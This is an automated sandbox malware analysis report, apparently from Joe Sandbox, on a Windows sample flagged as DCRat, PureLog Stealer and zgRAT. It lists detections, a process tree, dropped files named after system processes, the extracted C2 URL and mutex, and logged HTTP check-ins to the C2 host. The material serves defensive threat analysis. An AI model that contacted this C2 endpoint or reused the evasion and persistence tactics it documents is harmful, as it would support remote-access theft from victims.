Windows Analysis Report
150bIjWiGH.exe

Overview

General Information

Sample name:150bIjWiGH.exe
renamed because original name is a hash value
Original sample name:E7870CD0C30A52066C454C15A5A5A2F5.exe
Analysis ID:1575493
MD5:e7870cd0c30a52066c454c15a5a5a2f5
SHA1:fc64203e05c104a116e7e4c354c9ee77c99737d6
SHA256:e4a958444e72eb1b3be02f3a8bf29044a81f328405a4969a4f66515ef219774e
Tags:DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 150bIjWiGH.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\150bIjWiGH.exe" MD5: E7870CD0C30A52066C454C15A5A5A2F5)
    • cmd.exe (PID: 7784 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7832 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7848 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • 150bIjWiGH.exe (PID: 7956 cmdline: "C:\Users\user\Desktop\150bIjWiGH.exe" MD5: E7870CD0C30A52066C454C15A5A5A2F5)
  • cleanup
{"C2 url": "http://nutipa.ru/_authGamewordpress", "MUTEX": "DCR_MUTEX-1PskwlBIP03G3dSi5snm"}
Source | Rule | Description | Author | Strings
150bIjWiGH.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
150bIjWiGH.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\winlogon.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\winlogon.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: 150bIjWiGH.exe PID: 7648 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.150bIjWiGH.exe.fc0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.150bIjWiGH.exe.fc0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                              System Summary

                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\150bIjWiGH.exe, ProcessId: 7648, TargetFilename: C:\Recovery\winlogon.exe
                              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                              2024-12-15T19:36:25.013442+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 104.21.64.130 | 80 | TCP

                              AV Detection

                              Source: 150bIjWiGH.exeAvira: detected
                              Source: http://nutipa.ruAvira URL Cloud: Label: malware
                              Source: http://nutipa.ru/Avira URL Cloud: Label: malware
                              Source: http://nutipa.ru/_authGamewordpress.phpAvira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Temp\abd16af8Ll.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Program Files\Google\Chrome\Application\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\HwrGmkBt.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\BDOgJEwE.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\ItSOHkQo.logAvira: detection malicious, Label: TR/Agent.jbwuj
                              Source: C:\Users\user\Desktop\NjdutxKy.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                              Source: C:\Recovery\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\JtmEmBJF.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\NsNNYhlE.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://nutipa.ru/_authGamewordpress", "MUTEX": "DCR_MUTEX-1PskwlBIP03G3dSi5snm"}
                              Source: C:\Program Files\Google\Chrome\Application\Idle.exeReversingLabs: Detection: 71%
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeReversingLabs: Detection: 71%
                              Source: C:\Recovery\KcduafKotlNaKVM.exeReversingLabs: Detection: 71%
                              Source: C:\Recovery\conhost.exeReversingLabs: Detection: 71%
                              Source: C:\Recovery\winlogon.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\Desktop\BDOgJEwE.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\CBqofELz.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\FInxAXGv.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\ItSOHkQo.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\JBWWRkkK.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\NsNNYhlE.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\OmvnkQVc.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\XXHldJFg.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\ctybNUhB.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\fBwkimbw.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\gJztsmvT.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\imbBpzmp.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\jafJbNin.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\lcSrxwmi.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\mutAqiZC.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\pekirssD.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\rhLyTfpq.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\taahEcao.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\trhzTxUr.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\wINPCZGL.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\yVbyLHQi.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\zTDGhHfd.logReversingLabs: Detection: 25%
                              Source: 150bIjWiGH.exeReversingLabs: Detection: 71%
                              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: C:\Users\user\Desktop\CBqofELz.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Google\Chrome\Application\Idle.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\JBWWRkkK.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\HwrGmkBt.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\XXHldJFg.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\NjdutxKy.logJoe Sandbox ML: detected
                              Source: C:\Recovery\winlogon.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\EOEXonVW.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\NpUfPQGh.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\JtmEmBJF.logJoe Sandbox ML: detected
                              Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
                              Source: 150bIjWiGH.exeJoe Sandbox ML: detected
                              Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-1PskwlBIP03G3dSi5snm","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                              Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://nutipa.ru/","_authGamewordpress"]]
                              Source: 150bIjWiGH.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Google\Chrome\Application\Idle.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Google\Chrome\Application\6ccacd8608530fJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Uninstall Information\c73aadd6ea7e5bJump to behavior
                              Source: 150bIjWiGH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 104.21.64.130:80
                              Source: Joe Sandbox ViewIP Address: 104.21.64.130 104.21.64.130
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1392Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1392Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1404Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2532Expect: 100-continue
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: nutipa.ru
                              Source: unknownHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nutipa.ru
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nutipa.ru/
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nutipa.ru/_authGamewordpress.php
                              Source: 150bIjWiGH.exe, 00000000.00000002.1722563578.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BFCBE450_2_00007FFD9BFCBE45
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BFC16E00_2_00007FFD9BFC16E0
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BFDBE455_2_00007FFD9BFDBE45
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BFD16E05_2_00007FFD9BFD16E0
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\Application\Idle.exe E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                              Source: Joe Sandbox ViewDropped File: C:\Recovery\KcduafKotlNaKVM.exe E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                              Source: 150bIjWiGH.exe, 00000000.00000000.1675428024.000000000134A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exe, 00000000.00000002.1747363747.000000001C774000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exe, 00000000.00000002.1747363747.000000001C774000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@10/64@1/1
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Program Files\Google\Chrome\Application\Idle.exe
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\pekirssD.log
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMutant created: NULL
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-1PskwlBIP03G3dSi5snm
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\AppData\Local\Temp\GKtkfBoISL
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                              Source: 150bIjWiGH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 150bIjWiGH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile read: C:\Users\desktop.ini
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: 150bIjWiGH.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile read: C:\Users\user\Desktop\150bIjWiGH.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe"
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe"
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ktmw32.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dlnashext.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wpdshext.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: edputil.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: netutils.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: slc.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: userenv.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: sppc.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
